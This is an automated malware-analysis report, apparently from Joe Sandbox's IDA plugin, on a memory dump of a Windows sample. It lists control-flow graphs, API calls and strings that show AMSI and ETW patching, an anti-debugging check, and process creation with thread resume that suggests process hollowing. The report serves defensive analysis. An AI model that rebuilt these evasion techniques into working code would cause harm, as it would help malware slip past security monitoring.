                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1459852867-0
                                                                                                                                              • Opcode ID: 97311c2412812b380f08521188bae99ed0de798ce78c0aa4d3d47d1892d70ff4
                                                                                                                                              • Instruction ID: cf2c6d7c2d7e210326c788a34b89cf5668a6459b9851272470bf024e78c24ea1
                                                                                                                                              • Opcode Fuzzy Hash: 97311c2412812b380f08521188bae99ed0de798ce78c0aa4d3d47d1892d70ff4
                                                                                                                                              • Instruction Fuzzy Hash: 11014F7D90824CAFEB06EAA48941BCD77B9AB45704F5000939240E6082DF74AB148B66
                                                                                                                                              APIs
                                                                                                                                              • RtlInitUnicodeString.NTDLL ref: 0284DA6C
                                                                                                                                              • RtlDosPathNameToNtPathName_U.NTDLL(00000000,00000000,00000000,00000000), ref: 0284DA82
                                                                                                                                              • NtDeleteFile.NTDLL(?), ref: 0284DAA1
                                                                                                                                                • Part of subcall function 02834C0C: SysFreeString.OLEAUT32(?), ref: 02834C1A
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.2192353833.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02831000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_2831000_Oupzhkpr.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: PathString$DeleteFileFreeInitNameName_Unicode
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2256775434-0
                                                                                                                                              • Opcode ID: f33779f7ce2e41976a921b2e3bad5cca291c3d8bde5ae72dadf4bf6fc8dac801
                                                                                                                                              • Instruction ID: 3f1fd498e678a75a7a03195ff0f445243aff5b33e9ec0eaad2ad750f2d91a6b0
                                                                                                                                              • Opcode Fuzzy Hash: f33779f7ce2e41976a921b2e3bad5cca291c3d8bde5ae72dadf4bf6fc8dac801
                                                                                                                                              • Instruction Fuzzy Hash: 5601E17D90420CABEB11EAE4CD51FCEB3BDEB48710F504462E600E6180EB74AB148A65
                                                                                                                                              APIs
                                                                                                                                              • RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 0284DBEB
                                                                                                                                              • NtClose.NTDLL(?), ref: 0284DC65
                                                                                                                                                • Part of subcall function 02834C0C: SysFreeString.OLEAUT32(?), ref: 02834C1A
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.2192353833.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02831000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_2831000_Oupzhkpr.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Path$CloseFreeNameName_String
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 11680810-0
                                                                                                                                              • Opcode ID: f8e673397d58b04208dc94c41b445988dbb44e1f1159ea794c35b10d1382f758
                                                                                                                                              • Instruction ID: dd9477f70990ff44816c6493ac3991e1d69eb6f1d366ca4eb69ac9a0ad35b87c
                                                                                                                                              • Opcode Fuzzy Hash: f8e673397d58b04208dc94c41b445988dbb44e1f1159ea794c35b10d1382f758
                                                                                                                                              • Instruction Fuzzy Hash: A621C47965070C7BEB11EAD8CC46FDE77BDAB48700F504461B600F71C1DAB4AA058BA6

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 5349 2857877-2857c67 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 2834898 5464 2858af1-2858c74 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 2834898 5349->5464 5465 2857c6d-2857e40 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 2834798 call 283494c call 2834d20 call 2834d9c CreateProcessAsUserW 5349->5465 5554 2859420-285aa25 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 28346a4 * 2 call 2848824 call 28346a4 * 2 call 2848824 call 28346a4 * 2 call 2848824 call 28346a4 * 2 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 28346a4 * 2 call 2848824 call 28346a4 * 2 call 2848824 call 28346a4 * 2 call 2848824 call 28346a4 * 2 call 2848824 call 28346a4 * 2 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 28346a4 * 2 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 28346a4 * 2 call 2848824 call 28346a4 * 2 call 2848824 call 28346a4 * 2 call 2848824 call 28346a4 * 2 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 28346a4 * 2 call 2848824 call 28346a4 * 2 call 2848824 call 28346a4 * 2 call 2848824 call 28346a4 * 2 call 2848824 call 28346a4 * 2 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 * 16 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 28346a4 * 2 call 2848824 call 28346a4 * 2 call 2848824 call 28346a4 * 2 call 2848824 call 28346a4 * 2 call 2848824 call 28346a4 * 2 call 2848824 call 28346a4 * 2 call 2848824 call 28346a4 * 2 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 28346a4 * 2 call 2848824 call 28346a4 * 2 call 2848824 call 28346a4 * 2 call 2848824 call 28346a4 * 2 call 2848824 call 28346a4 * 2 call 2848824 call 28346a4 * 2 call 2848824 call 28346a4 * 2 call 2848824 call 28346a4 * 2 call 2848824 call 28346a4 * 2 call 2848824 call 28346a4 * 2 call 2848824 call 28346a4 * 2 call 2848824 call 28346a4 * 2 call 2848824 call 28346a4 * 2 call 2848824 call 28346a4 * 2 call 2848824 call 28346a4 * 2 call 2848824 call 28346a4 * 2 call 2848824 call 28346a4 * 2 call 2848824 call 28346a4 * 2 call 2848824 call 28346a4 * 2 call 2848824 call 2847b98 call 284818c call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 ExitProcess 5464->5554 5555 2858c7a-2858c89 call 2834898 5464->5555 5574 2857e42-2857eb9 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 5465->5574 5575 2857ebe-2857fc9 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 5465->5575 5555->5554 5564 2858c8f-2858f62 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 284e540 call 283480c call 283494c call 28346a4 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 2837e18 5555->5564 5822 2858f68-2859215 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 2834d8c * 2 call 2834734 call 284dacc 5564->5822 5823 285921a-285941b call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 28349a4 call 2848bb0 5564->5823 5574->5575 5675 2857fd0-28582f0 call 28349a4 call 284dc90 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 284cfa4 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 5575->5675 5676 2857fcb-2857fce 5575->5676 5992 28582f2-2858304 call 2848584 5675->5992 5993 2858309-2858aec call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 ResumeThread call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 CloseHandle call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 2847ed4 call 28487a0 * 6 CloseHandle call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 5675->5993 5676->5675 5822->5823 5823->5554 5992->5993 5993->5464
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 02848824: FreeLibrary.KERNEL32(02891384,00000000,02891388,Function_000055D8,00000004,02891398,02891388,05F5E0FF,00000040,0289139C,02891384,00000000,00000000,00000000,00000000,0284890B), ref: 028488EB
                                                                                                                                              • CreateProcessAsUserW.ADVAPI32(029857D8,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,029857DC,02985820,OpenSession,0288CE80,0285AFD8,UacScan,0288CE80), ref: 02857E39
                                                                                                                                              • ResumeThread.KERNEL32(02985824,ScanBuffer,0288CE80,0285AFD8,OpenSession,0288CE80,0285AFD8,UacScan,0288CE80,0285AFD8,ScanBuffer,0288CE80,0285AFD8,OpenSession,0288CE80,0285AFD8), ref: 02858483
                                                                                                                                              • CloseHandle.KERNEL32(02985820,ScanBuffer,0288CE80,0285AFD8,OpenSession,0288CE80,0285AFD8,UacScan,0288CE80,0285AFD8,02985824,ScanBuffer,0288CE80,0285AFD8,OpenSession,0288CE80), ref: 02858602
                                                                                                                                                • Part of subcall function 028487A0: LoadLibraryW.KERNEL32(?,?), ref: 028487B4
                                                                                                                                                • Part of subcall function 028487A0: GetProcAddress.KERNEL32(02891390,BCryptVerifySignature), ref: 028487CE
                                                                                                                                                • Part of subcall function 028487A0: FreeLibrary.KERNEL32(02891390,02891390,BCryptVerifySignature,bcrypt,?,028913D0,00000000,028913A4,0284A3C7,ScanString,028913A4,0284A77C,ScanBuffer,028913A4,0284A77C,Initialize), ref: 0284880A
                                                                                                                                              • CloseHandle.KERNEL32(02985820,02985820,ScanBuffer,0288CE80,0285AFD8,UacInitialize,0288CE80,0285AFD8,ScanBuffer,0288CE80,0285AFD8,OpenSession,0288CE80,0285AFD8,UacScan,0288CE80), ref: 028589F4
                                                                                                                                                • Part of subcall function 0284DACC: RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 0284DB0B
                                                                                                                                                • Part of subcall function 0284DACC: NtWriteFile.NTDLL(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000), ref: 0284DB72
                                                                                                                                                • Part of subcall function 0284DACC: NtClose.NTDLL(?), ref: 0284DB7B
                                                                                                                                                • Part of subcall function 0284818C: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02848216), ref: 028481F8
                                                                                                                                              • ExitProcess.KERNEL32(00000000,OpenSession,0288CE80,0285AFD8,ScanBuffer,0288CE80,0285AFD8,Initialize,0288CE80,0285AFD8,00000000,00000000,00000000,ScanString,0288CE80,0285AFD8), ref: 0285AA25
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.2192353833.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02831000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_2831000_Oupzhkpr.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CloseLibrary$FreeHandlePathProcess$AddressCacheCreateExitFileFlushInstructionLoadNameName_ProcResumeThreadUserWrite
                                                                                                                                              • String ID: 8)o $Advapi$BCryptVerifySignature$C:\Windows\System32\$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$I_QueryTagInformation$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$advapi32$bcrypt$dbgcore$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
                                                                                                                                              • API String ID: 376050052-2086206636
                                                                                                                                              • Opcode ID: d5847b6cbccd156b3abf2dded68ff9966358f3c31ddade802b8fe640f14bd5f4
                                                                                                                                              • Instruction ID: e653ffbb5ffd3a1a9fda7fd478efc92bb517a064794dcece7c3009f2504a4ee7
                                                                                                                                              • Opcode Fuzzy Hash: d5847b6cbccd156b3abf2dded68ff9966358f3c31ddade802b8fe640f14bd5f4
                                                                                                                                              • Instruction Fuzzy Hash: AD432D7DA101288BDB16EB68DD809DE73B6FF84300F5041E2E509E7754EA70EE858F92

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 8533 2831727-2831736 8534 2831968-283196d 8533->8534 8535 283173c-283174c 8533->8535 8538 2831973-2831984 8534->8538 8539 2831a80-2831a83 8534->8539 8536 28317a4-28317ad 8535->8536 8537 283174e-283175b 8535->8537 8536->8537 8544 28317af-28317bb 8536->8544 8540 2831774-2831780 8537->8540 8541 283175d-283176a 8537->8541 8542 2831986-28319a2 8538->8542 8543 2831938-2831945 8538->8543 8545 2831684-28316ad VirtualAlloc 8539->8545 8546 2831a89-2831a8b 8539->8546 8552 2831782-2831790 8540->8552 8553 28317f0-28317f9 8540->8553 8549 2831794-28317a1 8541->8549 8550 283176c-2831770 8541->8550 8554 28319b0-28319bf 8542->8554 8555 28319a4-28319ac 8542->8555 8543->8542 8551 2831947-283195b Sleep 8543->8551 8544->8537 8556 28317bd-28317c9 8544->8556 8547 28316df-28316e5 8545->8547 8548 28316af-28316dc call 2831644 8545->8548 8548->8547 8551->8542 8560 283195d-2831964 Sleep 8551->8560 8557 28317fb-2831808 8553->8557 8558 283182c-2831836 8553->8558 8562 28319c1-28319d5 8554->8562 8563 28319d8-28319e0 8554->8563 8561 2831a0c-2831a22 8555->8561 8556->8537 8564 28317cb-28317de Sleep 8556->8564 8557->8558 8567 283180a-283181e Sleep 8557->8567 8568 28318a8-28318b4 8558->8568 8569 2831838-2831863 8558->8569 8560->8543 8570 2831a24-2831a32 8561->8570 8571 2831a3b-2831a47 8561->8571 8562->8561 8565 28319e2-28319fa 8563->8565 8566 28319fc-28319fe call 28315cc 8563->8566 8564->8537 8573 28317e4-28317eb Sleep 8564->8573 8574 2831a03-2831a0b 8565->8574 8566->8574 8567->8558 8576 2831820-2831827 Sleep 8567->8576 8582 28318b6-28318c8 8568->8582 8583 28318dc-28318eb call 28315cc 8568->8583 8577 2831865-2831873 8569->8577 8578 283187c-283188a 8569->8578 8570->8571 8579 2831a34 8570->8579 8580 2831a49-2831a5c 8571->8580 8581 2831a68 8571->8581 8573->8536 8576->8557 8577->8578 8585 2831875 8577->8585 8586 28318f8 8578->8586 8587 283188c-28318a6 call 2831500 8578->8587 8579->8571 8588 2831a5e-2831a63 call 2831500 8580->8588 8589 2831a6d-2831a7f 8580->8589 8581->8589 8590 28318ca 8582->8590 8591 28318cc-28318da 8582->8591 8592 28318fd-2831936 8583->8592 8596 28318ed-28318f7 8583->8596 8585->8578 8586->8592 8587->8592 8588->8589 8590->8591 8591->8592
                                                                                                                                              APIs
                                                                                                                                              • Sleep.KERNEL32(00000000), ref: 028317D0
                                                                                                                                              • Sleep.KERNEL32(0000000A,00000000), ref: 028317E6
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.2192353833.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02831000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_2831000_Oupzhkpr.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Sleep
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3472027048-0
                                                                                                                                              • Opcode ID: 210bafb5673a69e0fcd93e23a4c870ebc23b7995e57f61c5ad63c47c2cadf862
                                                                                                                                              • Instruction ID: 450d57feb0d58a63f9fe06deaccf4f99b283896ef58344ea6b791192e311327e
                                                                                                                                              • Opcode Fuzzy Hash: 210bafb5673a69e0fcd93e23a4c870ebc23b7995e57f61c5ad63c47c2cadf862
                                                                                                                                              • Instruction Fuzzy Hash: 05B1127EA003508BEB16CF2CD888365BBE1EB85725F1886A9E54ECB3C5D7709461CBD0

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 8599 28487a0-28487c5 LoadLibraryW 8600 28487c7-28487df GetProcAddress 8599->8600 8601 284880f-2848815 8599->8601 8602 2848804-284880a FreeLibrary 8600->8602 8603 28487e1-2848800 call 2847d00 8600->8603 8602->8601 8603->8602 8606 2848802 8603->8606 8606->8602
                                                                                                                                              APIs
                                                                                                                                              • LoadLibraryW.KERNEL32(?,?), ref: 028487B4
                                                                                                                                              • GetProcAddress.KERNEL32(02891390,BCryptVerifySignature), ref: 028487CE
                                                                                                                                              • FreeLibrary.KERNEL32(02891390,02891390,BCryptVerifySignature,bcrypt,?,028913D0,00000000,028913A4,0284A3C7,ScanString,028913A4,0284A77C,ScanBuffer,028913A4,0284A77C,Initialize), ref: 0284880A
                                                                                                                                                • Part of subcall function 02847D00: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02847D74
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.2192353833.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02831000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_2831000_Oupzhkpr.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
                                                                                                                                              • String ID: BCryptVerifySignature$bcrypt
                                                                                                                                              • API String ID: 1002360270-4067648912
                                                                                                                                              • Opcode ID: 277d752e63e7a0904a098cd68fb898eb8e04ac683af0231135054320d261ace6
                                                                                                                                              • Instruction ID: bfb5027b3d0790b112a68cba289ee43bcb7d34a32836ae4e4ebfa646c17d216d
                                                                                                                                              • Opcode Fuzzy Hash: 277d752e63e7a0904a098cd68fb898eb8e04ac683af0231135054320d261ace6
                                                                                                                                              • Instruction Fuzzy Hash: 4FF0817DA88219EBEB119A6CA84CB7633BC9741358F0C0929B10CC76C0E7781410AB50

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              • LoadLibraryW.KERNEL32(amsi), ref: 02848715
                                                                                                                                                • Part of subcall function 028480C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 0284811B
                                                                                                                                                • Part of subcall function 028480C8: GetProcAddress.KERNEL32(?,?), ref: 0284812D
                                                                                                                                                • Part of subcall function 02847D00: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02847D74
                                                                                                                                              • FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02848774
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.2192353833.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02831000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_2831000_Oupzhkpr.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AddressLibraryProc$FreeLoadMemoryVirtualWrite
                                                                                                                                              • String ID: DllGetClassObject$W$amsi
                                                                                                                                              • API String ID: 2980007069-2671292670
                                                                                                                                              • Opcode ID: 02bbbadb8e52de5e5b84c5f9041d9baca92d5850e9eb7d5494b1e574985de9af
                                                                                                                                              • Instruction ID: e41cd5f0d7560eef3902020fa422f8c68fc207b2451fdd2d64ab7080c339f4d7
                                                                                                                                              • Opcode Fuzzy Hash: 02bbbadb8e52de5e5b84c5f9041d9baca92d5850e9eb7d5494b1e574985de9af
                                                                                                                                              • Instruction Fuzzy Hash: DDF0A45910C385BAE201E67C8C45F4FBECD4B52224F048A5CF1E8D62D2EA79D1048BB7

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 8616 284ebf0-284ec0a GetModuleHandleW 8617 284ec36-284ec3e 8616->8617 8618 284ec0c-284ec1e GetProcAddress 8616->8618 8618->8617 8619 284ec20-284ec30 CheckRemoteDebuggerPresent 8618->8619 8619->8617 8620 284ec32 8619->8620 8620->8617
                                                                                                                                              APIs
                                                                                                                                              • GetModuleHandleW.KERNEL32(KernelBase), ref: 0284EC00
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 0284EC12
                                                                                                                                              • CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 0284EC29
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.2192353833.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02831000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_2831000_Oupzhkpr.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AddressCheckDebuggerHandleModulePresentProcRemote
                                                                                                                                              • String ID: CheckRemoteDebuggerPresent$KernelBase
                                                                                                                                              • API String ID: 35162468-539270669
                                                                                                                                              • Opcode ID: 6434a407fed6a159718683cf69967ce1dd0673d6f65734b8609a76727851ba29
                                                                                                                                              • Instruction ID: b5d655d947dc35719f00eaf550d3d688fbc9cc3a315bc71236421a312581208b
                                                                                                                                              • Opcode Fuzzy Hash: 6434a407fed6a159718683cf69967ce1dd0673d6f65734b8609a76727851ba29
                                                                                                                                              • Instruction Fuzzy Hash: BFF0A77C90425CBBFB22A7AC88897DCFBA96B05328F640795D424E11D1FB7507448696

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 8621 2831a8f-2831a9b 8622 2831aa1-2831aa5 8621->8622 8623 2831b6c-2831b6f 8621->8623 8626 2831aa7-2831aae 8622->8626 8627 2831b08-2831b11 8622->8627 8624 2831b75-2831b7f 8623->8624 8625 2831c5c-2831c60 8623->8625 8628 2831b81-2831b8d 8624->8628 8629 2831b3c-2831b49 8624->8629 8632 2831c66-2831c6b 8625->8632 8633 28316e8-283170b call 2831644 VirtualFree 8625->8633 8630 2831ab0-2831abb 8626->8630 8631 2831adc-2831ade 8626->8631 8627->8626 8634 2831b13-2831b27 Sleep 8627->8634 8638 2831bc4-2831bd2 8628->8638 8639 2831b8f-2831b92 8628->8639 8629->8628 8637 2831b4b-2831b5f Sleep 8629->8637 8640 2831ac4-2831ad9 8630->8640 8641 2831abd-2831ac2 8630->8641 8642 2831af3 8631->8642 8643 2831ae0-2831af1 8631->8643 8649 2831716 8633->8649 8650 283170d-2831714 8633->8650 8634->8626 8636 2831b2d-2831b38 Sleep 8634->8636 8636->8627 8637->8628 8645 2831b61-2831b68 Sleep 8637->8645 8646 2831b96-2831b9a 8638->8646 8648 2831bd4-2831bd9 call 28314c0 8638->8648 8639->8646 8647 2831af6-2831b03 8642->8647 8643->8642 8643->8647 8645->8629 8651 2831bdc-2831be9 8646->8651 8652 2831b9c-2831ba2 8646->8652 8647->8624 8648->8646 8656 2831719-2831723 8649->8656 8650->8656 8651->8652 8655 2831beb-2831bf2 call 28314c0 8651->8655 8657 2831bf4-2831bfe 8652->8657 8658 2831ba4-2831bc2 call 2831500 8652->8658 8655->8652 8660 2831c00-2831c28 VirtualFree 8657->8660 8661 2831c2c-2831c59 call 2831560 8657->8661
                                                                                                                                              APIs
                                                                                                                                              • Sleep.KERNEL32(00000000), ref: 02831B17
                                                                                                                                              • Sleep.KERNEL32(0000000A,00000000), ref: 02831B31
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.2192353833.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02831000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_2831000_Oupzhkpr.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Sleep
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3472027048-0
                                                                                                                                              • Opcode ID: ad8039016cd13b4b156dad24199bb5b2b5e3d3ece3e6b2ffcc57ada4babc4dbf
                                                                                                                                              • Instruction ID: e757f7314acfa988f39179effaf9e60616c8067468fa67bb51f9e97793c70f20
